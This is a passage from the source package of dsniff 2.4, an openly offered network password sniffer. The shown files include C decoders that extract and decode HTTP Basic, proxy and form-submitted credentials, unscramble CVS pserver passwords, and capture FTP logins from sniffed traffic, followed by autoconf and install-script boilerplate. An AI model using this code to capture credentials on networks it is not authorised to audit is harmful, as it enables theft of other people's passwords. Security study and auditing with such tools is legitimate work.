strtok(tmp, "&"); p != NULL; p = strtok(NULL, "&")) { if ((q = strchr(p, '=')) == NULL) continue; *q = '\0'; if (!user) { if (regexec(user_regex, p, 0, NULL, 0) == 0) { user = 1; continue; } } if (!pass) { if (regexec(pass_regex, p, 0, NULL, 0) == 0) pass = 1; } if (user && pass) break; } free(tmp); return (user && pass); } static char * http_req_dirname(char *req) { char *uri, *vers; if ((uri = strchr(req, ' ')) == NULL) return (req); if ((vers = strrchr(uri, ' ')) == uri) { vers = NULL; } else if (vers[-1] == '/') { return (req); } else *vers++ = '\0'; strcpy(req, dirname(req)); strcat(req, "/"); if (vers) { strcat(req, " "); strcat(req, vers); } return (req); } int decode_http(u_char *buf, int len, u_char *obuf, int olen) { struct buf *msg, inbuf, outbuf; char *p, *req, *auth, *pauth, *query, *host; int i; buf_init(&inbuf, buf, len); buf_init(&outbuf, obuf, olen); if (user_regex == NULL || pass_regex == NULL) { if ((user_regex = malloc(sizeof(*user_regex))) == NULL || (pass_regex = malloc(sizeof(*pass_regex))) == NULL) err(1, "malloc"); if (regcomp(user_regex, USER_REGEX, REGEX_FLAGS) || regcomp(pass_regex, PASS_REGEX, REGEX_FLAGS)) errx(1, "regcomp failed"); } while ((i = buf_index(&inbuf, "\r\n\r\n", 4)) >= 0) { msg = buf_tok(&inbuf, NULL, i); msg->base[msg->end] = '\0'; buf_skip(&inbuf, 4); if ((req = strtok(buf_ptr(msg), "\r\n")) == NULL) continue; if (strncmp(req, "GET ", 4) != 0 && strncmp(req, "POST ", 5) != 0 && strncmp(req, "CONNECT ", 8) != 0) continue; auth = pauth = query = host = NULL; if ((query = strchr(req, '?')) != NULL) query++; while ((p = strtok(NULL, "\r\n")) != NULL) { if (strncasecmp(p, "Authorization: Basic ", 21) == 0) { auth = p; } else if (strncasecmp(p, "Proxy-authorization: " "Basic ", 27) == 0) { pauth = p; } else if (strncasecmp(p, "Host: ", 6) == 0) { host = p; } else if (req[0] == 'P') { if (strncmp(p, "Content-type: ", 14) == 0) { if (strncmp(p + 14, "application/" "x-www-form-urlencoded", 33) != 0) { query = NULL; } } else if (strncmp(p, "Content-length: ", 16) == 0) { p += 16; i = atoi(p); if ((msg = buf_tok(&inbuf, NULL, i)) == NULL) continue; msg->base[msg->end] = '\0'; query = buf_ptr(msg); } } } if (auth || pauth || (query && grep_query_auth(query))) { if (buf_tell(&outbuf) > 0) buf_putf(&outbuf, "\n"); if (req[0] == 'G' && auth) req = http_req_dirname(req); buf_putf(&outbuf, "%s\n", req); if (host) buf_putf(&outbuf, "%s\n", host); if (pauth) { buf_putf(&outbuf, "%s", pauth); p = pauth + 27; i = base64_pton(p, p, strlen(p)); p[i] = '\0'; buf_putf(&outbuf, " [%s]\n", p); } if (auth) { buf_putf(&outbuf, "%s", auth); p = auth + 21; i = base64_pton(p, p, strlen(p)); p[i] = '\0'; buf_putf(&outbuf, " [%s]\n", p); } else if (req[0] == 'P' && query) { buf_putf(&outbuf, "Content-type: application/" "x-www-form-urlencoded\n" "Content-length: %d\n%s\n", strlen(query), query); } } } buf_end(&outbuf); return (buf_len(&outbuf)); } dsniff-2.4/acconfig.h0000600000175000017500000000103507210742624014413 0ustar lucianoluciano/* Define to 'uint32_t' if doesn't define. */ #undef u_int32_t /* Define to 'uint64_t' if doesn't define. */ #undef u_int64_t /* Define to 'u_int32_t' if doesn't define. */ #undef in_addr_t /* Define if you have the header file. */ #undef HAVE_DB_H /* Define if you have the header file. */ #undef HAVE_DB_185_H /* Should be in , *sigh* */ #undef HAVE_MINMAX #ifndef HAVE_MINMAX #define MIN(a,b) (((a)<(b))?(a):(b)) #define MAX(a,b) (((a)>(b))?(a):(b)) #endif dsniff-2.4/decode_cvs.c0000600000175000017500000000411107254077073014740 0ustar lucianoluciano/* * decode_cvs.c * * Concurrent Versions System. * * Copyright (c) 2000 Dug Song * * $Id: decode_cvs.c,v 1.6 2001/03/15 08:32:59 dugsong Exp $ */ #include "config.h" #include #include #include #include "buf.h" #include "decode.h" /* stolen from CVS scramble.c */ static u_char cvs_shifts[] = { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 114,120, 53, 79, 96,109, 72,108, 70, 64, 76, 67,116, 74, 68, 87, 111, 52, 75,119, 49, 34, 82, 81, 95, 65,112, 86,118,110,122,105, 41, 57, 83, 43, 46,102, 40, 89, 38,103, 45, 50, 42,123, 91, 35, 125, 55, 54, 66,124,126, 59, 47, 92, 71,115, 78, 88,107,106, 56, 36,121,117,104,101,100, 69, 73, 99, 63, 94, 93, 39, 37, 61, 48, 58,113, 32, 90, 44, 98, 60, 51, 33, 97, 62, 77, 84, 80, 85,223, 225,216,187,166,229,189,222,188,141,249,148,200,184,136,248,190, 199,170,181,204,138,232,218,183,255,234,220,247,213,203,226,193, 174,172,228,252,217,201,131,230,197,211,145,238,161,179,160,212, 207,221,254,173,202,146,224,151,140,196,205,130,135,133,143,246, 192,159,244,239,185,168,215,144,139,165,180,157,147,186,214,176, 227,231,219,169,175,156,206,198,129,164,150,210,154,177,134,127, 182,128,158,208,162,132,167,209,149,241,153,251,237,236,171,195, 243,233,253,240,194,250,191,155,142,137,245,235,163,242,178,152 }; int decode_cvs(u_char *buf, int len, u_char *obuf, int olen) { struct buf *line, inbuf, outbuf; u_char *p; int i, n; buf_init(&inbuf, buf, len); buf_init(&outbuf, obuf, olen); if (buf_cmp(&inbuf, "BEGIN ", 6) != 0) return (0); for (n = 0; n < 5 && (i = buf_index(&inbuf, "\n", 1)) != -1; n++) { line = buf_tok(&inbuf, NULL, i + 1); line->base[line->end - 1] = '\0'; p = buf_ptr(line); buf_putf(&outbuf, "%s", p); if (n == 3) { if (p[0] != 'A') return (0); for (i = 1; i < sizeof(cvs_shifts) - 1 && p[i]; i++) p[i] = cvs_shifts[p[i]]; buf_putf(&outbuf, " [%s]", p + 1); } buf_put(&outbuf, "\n", 1); } buf_end(&outbuf); return (buf_len(&outbuf)); } dsniff-2.4/decode_ftp.c0000600000175000017500000000210607254077073014740 0ustar lucianoluciano/* * decode_ftp.c * * File Transfer Protocol. * * Copyright (c) 2000 Dug Song * * $Id: decode_ftp.c,v 1.7 2001/03/15 08:32:59 dugsong Exp $ */ #include "config.h" #include #include #include #include "options.h" #include "buf.h" #include "decode.h" int decode_ftp(u_char *buf, int len, u_char *obuf, int olen) { struct buf *line, inbuf, outbuf; int i, n; if ((len = strip_telopts(buf, len)) == 0) return (0); buf_init(&inbuf, buf, len); buf_init(&outbuf, obuf, olen); if (!buf_isascii(&inbuf)) return (0); n = 0; while ((i = buf_index(&inbuf, "\n", 1)) != -1) { line = buf_tok(&inbuf, NULL, i); buf_skip(&inbuf, 1); if (i > 0 && line->base[i - 1] == '\r') line->end--; line->base[line->end] = '\0'; if (strncasecmp(buf_ptr(line), "USER ", 5) == 0 || strncasecmp(buf_ptr(line), "ACCT ", 5) == 0 || strncasecmp(buf_ptr(line), "PASS ", 5) == 0) { buf_putf(&outbuf, "%s\n", buf_ptr(line)); n++; } } if (n < 2) return (0); buf_end(&outbuf); return (buf_len(&outbuf)); } dsniff-2.4/configure.in0000600000175000017500000002163307220157331015004 0ustar lucianolucianodnl configure.in dnl dnl Copyright (c) 2000 Dug Song dnl dnl $Id: configure.in,v 1.27 2000/12/20 16:31:21 dugsong Exp $ AC_INIT(dsniff.c) AC_CONFIG_HEADER(config.h) dnl Initialize prefix. if test "$prefix" = "NONE"; then prefix="/usr/local" fi dnl Checks for programs. AC_PROG_CC AC_PROG_INSTALL AC_PROG_RANLIB dnl Checks for header files. AC_PATH_XTRA AC_HEADER_STDC AC_CHECK_HEADERS(err.h fcntl.h sys/ioctl.h sys/queue.h unistd.h libgen.h net/if_tun.h) dnl XXX - Solaris sux. AC_MSG_CHECKING(for MIN and MAX in sys/param.h) AC_EGREP_CPP(yes, [ #include #if defined(MAX) && defined(MIN) yes #endif ], [ AC_MSG_RESULT(yes); AC_DEFINE(HAVE_MINMAX) ], [ AC_MSG_RESULT(no) ] ) dnl Checks for typedefs, structures, and compiler characteristics. AC_C_CONST AC_TYPE_SIZE_T AC_STRUCT_TM dnl XXX - Solaris sux. AC_CHECK_TYPE(u_int32_t, uint32_t) AC_CHECK_TYPE(u_int64_t, uint64_t) dnl XXX - Linux sux. AC_CHECK_TYPE(in_addr_t, u_int32_t) CFLAGS="$CFLAGS -D_BSD_SOURCE" dnl Checks for library functions. AC_PROG_GCC_TRADITIONAL AC_FUNC_MEMCMP AC_TYPE_SIGNAL AC_FUNC_STRFTIME AC_CHECK_FUNCS(gethostname socket strdup strstr) AC_CHECK_LIB(rpcsvc, xdr_fhstatus) dnl XXX - Solaris sux. AC_CHECK_LIB(socket, socket) AC_CHECK_LIB(nsl, gethostbyname) dnl XXX - feh, everything except OpenBSD sux. AC_CHECK_LIB(resolv, dn_expand) AC_REPLACE_FUNCS(dirname strlcpy strlcat strsep) needmd5=no AC_CHECK_FUNCS(MD5Update, , [needmd5=yes]) if test $needmd5 = yes; then LIBOBJS="$LIBOBJS md5.o" fi neederr=no AC_CHECK_FUNCS(warnx, , [neederr=yes]) if test $neederr = yes; then LIBOBJS="$LIBOBJS err.o" fi needethers=no AC_CHECK_FUNCS(ether_ntoa, , [needethers=yes]) if test $needethers = yes; then LIBOBJS="$LIBOBJS ethers.o" fi dnl Checks for BSD tunnel device dnl if test "x$ac_cv_header_net_if_tun_h" = "xyes"; then dnl TCPHIJACK="tcphijack" dnl fi AC_SUBST(TCPHIJACK) dnl Checks for X11 if test "x$no_x" = "x"; then WEBSPY="webspy"; AC_SUBST(WEBSPY) fi dnl Checks for Berkeley DB AC_MSG_CHECKING(for Berkeley DB with 1.85 compatibility) AC_ARG_WITH(db, [ --with-db=DIR use Berkeley DB (with --enable-compat185) in DIR], [ case "$withval" in yes|no) AC_MSG_RESULT(no) ;; *) AC_MSG_RESULT($withval) if test -f $withval/build_unix/db_185.h -a \ -f $withval/build_unix/libdb.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi AC_DEFINE(HAVE_DB_185_H) DBINC="-I$withval/build_unix" DBLIB="-L$withval/build_unix -ldb" elif test -f $withval/dist/db_185.h -a \ -f $withval/dist/libdb.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi AC_DEFINE(HAVE_DB_185_H) DBINC="-I$withval/dist" DBLIB="-L$withval/dist -ldb" elif test -f $withval/include/db_185.h -a \ -f $withval/lib/libdb.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi AC_DEFINE(HAVE_DB_185_H) DBINC="-I$withval/include" DBLIB="-L$withval/lib -ldb" else AC_ERROR(db_185.h or libdb.a not found in $withval or not configured with --enable-compat185) fi ;; esac ], [ for dir in ${prefix}/BerkeleyDB.3.1 ${prefix}/BerkeleyDB.3.0 \ ${prefix}/BerkeleyDB ${prefix}/db ${prefix}; do if test -f ${dir}/include/db_185.h; then AC_DEFINE(HAVE_DB_185_H) DBINC="-I${dir}/include" DBLIB="-L${dir}/lib -ldb" have_db=yes break elif test -f ${dir}/include/db.h; then AC_DEFINE(HAVE_DB_H) DBINC="-I${dir}/include" DBLIB="-L${dir}/lib -ldb" have_db=yes break fi done if test "x$have_db" = "x"; then if test -f /usr/include/db2/db_185.h; then AC_DEFINE(HAVE_DB_185_H) DBINC="-I/usr/include/db2" DBLIB="-ldb2" have_db=yes elif test -f /usr/include/db_185.h; then AC_DEFINE(HAVE_DB_185_H) DBLIB="-ldb" have_db=yes elif test -f /usr/include/db.h; then AC_DEFINE(HAVE_DB_H) have_db=yes fi fi if test "x$have_db" = "x"; then AC_ERROR(Berkeley DB with 1.85 compatibility not found) fi AC_MSG_RESULT(yes) ] ) AC_SUBST(DBINC) AC_SUBST(DBLIB) dnl Checks for libpcap AC_MSG_CHECKING(for libpcap) AC_ARG_WITH(libpcap, [ --with-libpcap=DIR use libpcap in DIR], [ case "$withval" in yes|no) AC_MSG_RESULT(no) ;; *) AC_MSG_RESULT($withval) if test -f $withval/pcap.h -a -f $withval/libpcap.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi PCAPINC="-I$withval -I$withval/bpf" PCAPLIB="-L$withval -lpcap" elif test -f $withval/include/pcap.h -a \ -f $withval/include/net/bpf.h -a \ -f $withval/lib/libpcap.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi PCAPINC="-I$withval/include" PCAPLIB="-L$withval/lib -lpcap" else AC_ERROR(pcap.h, net/bpf.h, or libpcap.a not found in $withval) fi ;; esac ], [ if test -f ${prefix}/include/pcap.h; then PCAPINC="-I${prefix}/include" PCAPLIB="-L${prefix}/lib -lpcap" elif test -f /usr/include/pcap/pcap.h; then PCAPINC="-I/usr/include/pcap" PCAPLIB="-lpcap" elif test -f /usr/include/pcap.h; then PCAPLIB="-lpcap" else AC_MSG_RESULT(no) AC_ERROR(libpcap not found) fi AC_MSG_RESULT(yes) ] ) AC_SUBST(PCAPINC) AC_SUBST(PCAPLIB) dnl Checks for libnet AC_MSG_CHECKING(for libnet) AC_ARG_WITH(libnet, [ --with-libnet=DIR use libnet in DIR], [ case "$withval" in yes|no) AC_MSG_RESULT(no) ;; *) AC_MSG_RESULT($withval) if test -f $withval/include/libnet.h -a -f $withval/lib/libnet.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi if test -f $withval/bin/libnet-config; then CFLAGS="$CFLAGS `$withval/bin/libnet-config --defines`" elif test -f $withval/libnet-config; then CFLAGS="$CFLAGS `$withval/libnet-config --defines`" else CFLAGS="$CFLAGS `libnet-config --defines`" fi LNETINC="-I$withval/include" LNETLIB="-L$withval/lib -lnet" else AC_ERROR(libnet.h or libnet.a not found in $withval) fi ;; esac ], [ if test -f ${prefix}/include/libnet.h; then CFLAGS="$CFLAGS `${prefix}/bin/libnet-config --defines`" LNETINC="-I${prefix}/include" LNETLIB="-L${prefix}/lib -lnet" elif test -f /usr/include/libnet.h; then CFLAGS="$CFLAGS `libnet-config --defines`" LNETLIB="-lnet" else AC_MSG_RESULT(no) AC_ERROR(libnet not found) fi AC_MSG_RESULT(yes) ] ) AC_SUBST(LNETINC) AC_SUBST(LNETLIB) dnl Checks for libnids AC_MSG_CHECKING(for libnids) AC_ARG_WITH(libnids, [ --with-libnids=DIR use libnids in DIR], [ case "$withval" in yes|no) AC_MSG_RESULT(no) ;; *) AC_MSG_RESULT($withval) if test -f $withval/src/nids.h -a -f $withval/src/libnids.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi NIDSINC="-I$withval/src" NIDSLIB="-L$withval/src -lnids" elif test -f $withval/include/nids.h -a -f $withval/lib/libnids.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi NIDSINC="-I$withval/include" NIDSLIB="-L$withval/lib -lnids" else AC_ERROR(nids.h or libnids.a not found in $withval) fi ;; esac ], [ if test -f ${prefix}/include/nids.h; then NIDSINC="-I${prefix}/include" NIDSLIB="-L${prefix}/lib -lnids" elif test -f /usr/include/nids.h; then NIDSLIB="-lnids" else AC_MSG_RESULT(no) AC_ERROR(libnids not found) fi AC_MSG_RESULT(yes) ] ) save_cppflags="$CPPFLAGS" CPPFLAGS="$NIDSINC" AC_MSG_CHECKING(whether libnids version is good) AC_EGREP_HEADER(pcap_filter, nids.h, AC_MSG_RESULT(yes), [ AC_MSG_RESULT(no); AC_ERROR(libnids version 1.13 or greater required) ]) CPPFLAGS="$save_cppflags" AC_SUBST(NIDSINC) AC_SUBST(NIDSLIB) dnl Checks for OpenSSL AC_MSG_CHECKING(for OpenSSL) AC_ARG_WITH(openssl, [ --with-openssl=DIR use OpenSSL in DIR], [ case "$withval" in yes|no) AC_MSG_RESULT(no) ;; *) AC_MSG_RESULT($withval) if test -f $withval/include/openssl/ssl.h -a -f $withval/libssl.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi SSLINC="-I$withval/include" SSLLIB="-L$withval -lssl -lcrypto" elif test -f $withval/include/openssl/ssl.h -a \ -f $withval/lib/libssl.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi SSLINC="-I$withval/include" SSLLIB="-L$withval/lib -lssl -lcrypto" else AC_ERROR(ssl.h or libssl.a not found in $withval) fi WEBMITM="webmitm" ;; esac ], [ if test -f ${prefix}/include/openssl/ssl.h; then SSLINC="-I${prefix}/include" SSLLIB="-L${prefix}/lib -lssl -lcrypto" elif test -f ${prefix}/ssl/include/openssl/ssl.h; then SSLINC="-I${prefix}/ssl/include" SSLLIB="-L${prefix}/ssl/lib -lssl -lcrypto" elif test -f /usr/include/openssl/ssl.h; then SSLLIB="-lssl -lcrypto" else AC_MSG_RESULT(no) AC_ERROR(OpenSSL not found) fi AC_MSG_RESULT(yes) ] ) AC_SUBST(SSLINC) AC_SUBST(SSLLIB) AC_OUTPUT(Makefile) dsniff-2.4/install-sh0000700000175000017500000001124407204257542014501 0ustar lucianoluciano#! /bin/sh # # install - install a program, script, or datafile # This comes from X11R5. # # Calling this script install-sh is preferred over install.sh, to prevent # `make' implicit rules from creating a file called install from it # when there is no Makefile. # # This script is compatible with the BSD install script, but was written # from scratch. # # set DOITPROG to echo to test this script # Don't use :- since 4.3BSD and earlier shells don't like it. doit="${DOITPROG-}" # put in absolute paths if you don't have them in your path; or use env. vars. mvprog="${MVPROG-mv}" cpprog="${CPPROG-cp}" chmodprog="${CHMODPROG-chmod}" chownprog="${CHOWNPROG-chown}" chgrpprog="${CHGRPPROG-chgrp}" stripprog="${STRIPPROG-strip}" rmprog="${RMPROG-rm}" mkdirprog="${MKDIRPROG-mkdir}" tranformbasename="" transform_arg="" instcmd="$mvprog" chmodcmd="$chmodprog 0755" chowncmd="" chgrpcmd="" stripcmd="" rmcmd="$rmprog -f" mvcmd="$mvprog" src="" dst="" dir_arg="" while [ x"$1" != x ]; do case $1 in -c) instcmd="$cpprog" shift continue;; -d) dir_arg=true shift continue;; -m) chmodcmd="$chmodprog $2" shift shift continue;; -o) chowncmd="$chownprog $2" shift shift continue;; -g) chgrpcmd="$chgrpprog $2" shift shift continue;; -s) stripcmd="$stripprog" shift continue;; -t=*) transformarg=`echo $1 | sed 's/-t=//'` shift continue;; -b=*) transformbasename=`echo $1 | sed 's/-b=//'` shift continue;; *) if [ x"$src" = x ] then src=$1 else # this colon is to work around a 386BSD /bin/sh bug : dst=$1 fi shift continue;; esac done if [ x"$src" = x ] then echo "install: no input file specified" exit 1 else true fi if [ x"$dir_arg" != x ]; then dst=$src src="" if [ -d $dst ]; then instcmd=: else instcmd=mkdir fi else # Waiting for this to be detected by the "$instcmd $src $dsttmp" command # might cause directories to be created, which would be especially bad # if $src (and thus $dsttmp) contains '*'. if [ -f $src -o -d $src ] then true else echo "install: $src does not exist" exit 1 fi if [ x"$dst" = x ] then echo "install: no destination specified" exit 1 else true fi # If destination is a directory, append the input filename; if your system # does not like double slashes in filenames, you may need to add some logic if [ -d $dst ] then dst="$dst"/`basename $src` else true fi fi ## this sed command emulates the dirname command dstdir=`echo $dst | sed -e 's,[^/]*$,,;s,/$,,;s,^$,.,'` # Make sure that the destination directory exists. # this part is taken from Noah Friedman's mkinstalldirs script # Skip lots of stat calls in the usual case. if [ ! -d "$dstdir" ]; then defaultIFS=' ' IFS="${IFS-${defaultIFS}}" oIFS="${IFS}" # Some sh's can't handle IFS=/ for some reason. IFS='%' set - `echo ${dstdir} | sed -e 's@/@%@g' -e 's@^%@/@'` IFS="${oIFS}" pathcomp='' while [ $# -ne 0 ] ; do pathcomp="${pathcomp}${1}" shift if [ ! -d "${pathcomp}" ] ; then $mkdirprog "${pathcomp}" else true fi pathcomp="${pathcomp}/" done fi if [ x"$dir_arg" != x ] then $doit $instcmd $dst && if [ x"$chowncmd" != x ]; then $doit $chowncmd $dst; else true ; fi && if [ x"$chgrpcmd" != x ]; then $doit $chgrpcmd $dst; else true ; fi && if [ x"$stripcmd" != x ]; then $doit $stripcmd $dst; else true ; fi && if [ x"$chmodcmd" != x ]; then $doit $chmodcmd $dst; else true ; fi else # If we're going to rename the final executable, determine the name now. if [ x"$transformarg" = x ] then dstfile=`basename $dst` else dstfile=`basename $dst $transformbasename | sed $transformarg`$transformbasename fi # don't allow the sed command to completely eliminate the filename if [ x"$dstfile" = x ] then dstfile=`basename $dst` else true fi # Make a temp file name in the proper directory. dsttmp=$dstdir/#inst.$$# # Move or copy the file name to the temp name $doit $instcmd $src $dsttmp && trap "rm -f ${dsttmp}" 0 && # and set any options; do chmod last to preserve setuid bits # If any of these fail, we abort the whole thing. If we want to # ignore errors from any of these, just make sure not to ignore # errors from the above "$doit $instcmd $src $dsttmp" command. if [ x"$chowncmd" != x ]; then $doit $chowncmd $dsttmp; else true;fi && if [ x"$chgrpcmd" != x ]; then $doit $chgrpcmd $dsttmp; else true;fi && if [ x"$stripcmd" != x ]; then $doit $stripcmd $dsttmp; else true;fi && if [ x"$chmodcmd" != x ]; then $doit $chmodcmd $dsttmp; else true;fi && # Now rename the file to the real destination. $doit $rmcmd -f $dstdir/$dstfile && $doit $mvcmd $dsttmp $dstdir/$dstfile fi && exit 0 dsniff-2.4/configure0000700000175000017500000032121607255326265014414 0ustar lucianoluciano#! /bin/sh # Guess values for system-dependent variables and create Makefiles. # Generated automatically using autoconf version 2.13 # Copyright (C) 1992, 93, 94, 95, 96 Free Software Foundation, Inc. # # This configure script is free software; the Free Software Foundation # gives unlimited permission to copy, distribute and modify it. # Defaults: ac_help= ac_default_prefix=/usr/local # Any additions from configure.in: ac_help="$ac_help --with-x use the X Window System" ac_help="$ac_help --with-db=DIR use Berkeley DB (with --enable-compat185) in DIR" ac_help="$ac_help --with-libpcap=DIR use libpcap in DIR" ac_help="$ac_help --with-libnet=DIR use libnet in DIR" ac_help="$ac_help --with-libnids=DIR use libnids in DIR" ac_help="$ac_help --with-openssl=DIR use OpenSSL in DIR" # Initialize some variables set by options. # The variables have the same names as the options, with # dashes changed to underlines. build=NONE cache_file=./config.cache exec_prefix=NONE host=NONE no_create= nonopt=NONE no_recursion= prefix=NONE program_prefix=NONE program_suffix=NONE program_transform_name=s,x,x, silent= site= srcdir= target=NONE verbose= x_includes=NONE x_libraries=NONE bindir='${exec_prefix}/bin' sbindir='${exec_prefix}/sbin' libexecdir='${exec_prefix}/libexec' datadir='${prefix}/share' sysconfdir='${prefix}/etc' sharedstatedir='${prefix}/com' localstatedir='${prefix}/var' libdir='${exec_prefix}/lib' includedir='${prefix}/include' oldincludedir='/usr/include' infodir='${prefix}/info' mandir='${prefix}/man' # Initialize some other variables. subdirs= MFLAGS= MAKEFLAGS= SHELL=${CONFIG_SHELL-/bin/sh} # Maximum number of lines to put in a shell here document. ac_max_here_lines=12 ac_prev= for ac_option do # If the previous option needs an argument, assign it. if test -n "$ac_prev"; then eval "$ac_prev=\$ac_option" ac_prev= continue fi case "$ac_option" in -*=*) ac_optarg=`echo "$ac_option" | sed 's/[-_a-zA-Z0-9]*=//'` ;; *) ac_optarg= ;; esac # Accept the important Cygnus configure options, so we can diagnose typos. case "$ac_option" in -bindir | --bindir | --bindi | --bind | --bin | --bi) ac_prev=bindir ;; -bindir=* | --bindir=* | --bindi=* | --bind=* | --bin=* | --bi=*) bindir="$ac_optarg" ;; -build | --build | --buil | --bui | --bu) ac_prev=build ;; -build=* | --build=* | --buil=* | --bui=* | --bu=*) build="$ac_optarg" ;; -cache-file | --cache-file | --cache-fil | --cache-fi \ | --cache-f | --cache- | --cache | --cach | --cac | --ca | --c) ac_prev=cache_file ;; -cache-file=* | --cache-file=* | --cache-fil=* | --cache-fi=* \ | --cache-f=* | --cache-=* | --cache=* | --cach=* | --cac=* | --ca=* | --c=*) cache_file="$ac_optarg" ;; -datadir | --datadir | --datadi | --datad | --data | --dat | --da) ac_prev=datadir ;; -datadir=* | --datadir=* | --datadi=* | --datad=* | --data=* | --dat=* \ | --da=*) datadir="$ac_optarg" ;; -disable-* | --disable-*) ac_feature=`echo $ac_option|sed -e 's/-*disable-//'` # Reject names that are not valid shell variable names. if test -n "`echo $ac_feature| sed 's/[-a-zA-Z0-9_]//g'`"; then { echo "configure: error: $ac_feature: invalid feature name" 1>&2; exit 1; } fi ac_feature=`echo $ac_feature| sed 's/-/_/g'` eval "enable_${ac_feature}=no" ;; -enable-* | --enable-*) ac_feature=`echo $ac_option|sed -e 's/-*enable-//' -e 's/=.*//'` # Reject names that are not valid shell variable names. if test -n "`echo $ac_feature| sed 's/[-_a-zA-Z0-9]//g'`"; then { echo "configure: error: $ac_feature: invalid feature name" 1>&2; exit 1; } fi ac_feature=`echo $ac_feature| sed 's/-/_/g'` case "$ac_option" in *=*) ;; *) ac_optarg=yes ;; esac eval "enable_${ac_feature}='$ac_optarg'" ;; -exec-prefix | --exec_prefix | --exec-prefix | --exec-prefi \ | --exec-pref | --exec-pre | --exec-pr | --exec-p | --exec- \ | --exec | --exe | --ex) ac_prev=exec_prefix ;; -exec-prefix=* | --exec_prefix=* | --exec-prefix=* | --exec-prefi=* \ | --exec-pref=* | --exec-pre=* | --exec-pr=* | --exec-p=* | --exec-=* \ | --exec=* | --exe=* | --ex=*) exec_prefix="$ac_optarg" ;; -gas | --gas | --ga | --g) # Obsolete; use --with-gas. with_gas=yes ;; -help | --help | --hel | --he) # Omit some internal or obsolete options to make the list less imposing. # This message is too long to be a string in the A/UX 3.1 sh. cat << EOF Usage: configure [options] [host] Options: [defaults in brackets after descriptions] Configuration: --cache-file=FILE cache test results in FILE --help print this message --no-create do not create output files --quiet, --silent do not print \`checking...' messages --version print the version of autoconf that created configure Directory and file names: --prefix=PREFIX install architecture-independent files in PREFIX [$ac_default_prefix] --exec-prefix=EPREFIX install architecture-dependent files in EPREFIX [same as prefix] --bindir=DIR user executables in DIR [EPREFIX/bin] --sbindir=DIR system admin executables in DIR [EPREFIX/sbin] --libexecdir=DIR program executables in DIR [EPREFIX/libexec] --datadir=DIR read-only architecture-independent data in DIR [PREFIX/share] --sysconfdir=DIR read-only single-machine data in DIR [PREFIX/etc] --sharedstatedir=DIR modifiable architecture-independent data in DIR [PREFIX/com] --localstatedir=DIR modifiable single-machine data in DIR [PREFIX/var] --libdir=DIR object code libraries in DIR [EPREFIX/lib] --includedir=DIR C header files in DIR [PREFIX/include] --oldincludedir=DIR C header files for non-gcc in DIR [/usr/include] --infodir=DIR info documentation in DIR [PREFIX/info] --mandir=DIR man documentation in DIR [PREFIX/man] --srcdir=DIR find the sources in DIR [configure dir or ..] --program-prefix=PREFIX prepend PREFIX to installed program names --program-suffix=SUFFIX append SUFFIX to installed program names --program-transform-name=PROGRAM run sed PROGRAM on installed program names EOF cat << EOF Host type: --build=BUILD configure for building on BUILD [BUILD=HOST] --host=HOST configure for HOST [guessed] --target=TARGET configure for TARGET [TARGET=HOST] Features and packages: --disable-FEATURE do not include FEATURE (same as --enable-FEATURE=no) --enable-FEATURE[=ARG] include FEATURE [ARG=yes] --with-PACKAGE[=ARG] use PACKAGE [ARG=yes] --without-PACKAGE do not use PACKAGE (same as --with-PACKAGE=no) --x-includes=DIR X include files are in DIR --x-libraries=DIR X library files are in DIR EOF if test -n "$ac_help"; then echo "--enable and --with options recognized:$ac_help" fi exit 0 ;; -host | --host | --hos | --ho) ac_prev=host ;; -host=* | --host=* | --hos=* | --ho=*) host="$ac_optarg" ;; -includedir | --includedir | --includedi | --included | --include \ | --includ | --inclu | --incl | --inc) ac_prev=includedir ;; -includedir=* | --includedir=* | --includedi=* | --included=* | --include=* \ | --includ=* | --inclu=* | --incl=* | --inc=*) includedir="$ac_optarg" ;; -infodir | --infodir | --infodi | --infod | --info | --inf) ac_prev=infodir ;; -infodir=* | --infodir=* | --infodi=* | --infod=* | --info=* | --inf=*) infodir="$ac_optarg" ;; -libdir | --libdir | --libdi | --libd) ac_prev=libdir ;; -libdir=* | --libdir=* | --libdi=* | --libd=*) libdir="$ac_optarg" ;; -libexecdir | --libexecdir | --libexecdi | --libexecd | --libexec \ | --libexe | --libex | --libe) ac_prev=libexecdir ;; -libexecdir=* | --libexecdir=* | --libexecdi=* | --libexecd=* | --libexec=* \ | --libexe=* | --libex=* | --libe=*) libexecdir="$ac_optarg" ;; -localstatedir | --localstatedir | --localstatedi | --localstated \ | --localstate | --localstat | --localsta | --localst \ | --locals | --local | --loca | --loc | --lo) ac_prev=localstatedir ;; -localstatedir=* | --localstatedir=* | --localstatedi=* | --localstated=* \ | --localstate=* | --localstat=* | --localsta=* | --localst=* \ | --locals=* | --local=* | --loca=* | --loc=* | --lo=*) localstatedir="$ac_optarg" ;; -mandir | --mandir | --mandi | --mand | --man | --ma | --m) ac_prev=mandir ;; -mandir=* | --mandir=* | --mandi=* | --mand=* | --man=* | --ma=* | --m=*) mandir="$ac_optarg" ;; -nfp | --nfp | --nf) # Obsolete; use --without-fp. with_fp=no ;; -no-create | --no-create | --no-creat | --no-crea | --no-cre \ | --no-cr | --no-c) no_create=yes ;; -no-recursion | --no-recursion | --no-recursio | --no-recursi \ | --no-recurs | --no-recur | --no-recu | --no-rec | --no-re | --no-r) no_recursion=yes ;; -oldincludedir | --oldincludedir | --oldincludedi | --oldincluded \ | --oldinclude | --oldinclud | --oldinclu | --oldincl | --oldinc \ | --oldin | --oldi | --old | --ol | --o) ac_prev=oldincludedir ;; -oldincludedir=* | --oldincludedir=* | --oldincludedi=* | --oldincluded=* \ | --oldinclude=* | --oldinclud=* | --oldinclu=* | --oldincl=* | --oldinc=* \ | --oldin=* | --oldi=* | --old=* | --ol=* | --o=*) oldincludedir="$ac_optarg" ;; -prefix | --prefix | --prefi | --pref | --pre | --pr | --p) ac_prev=prefix ;; 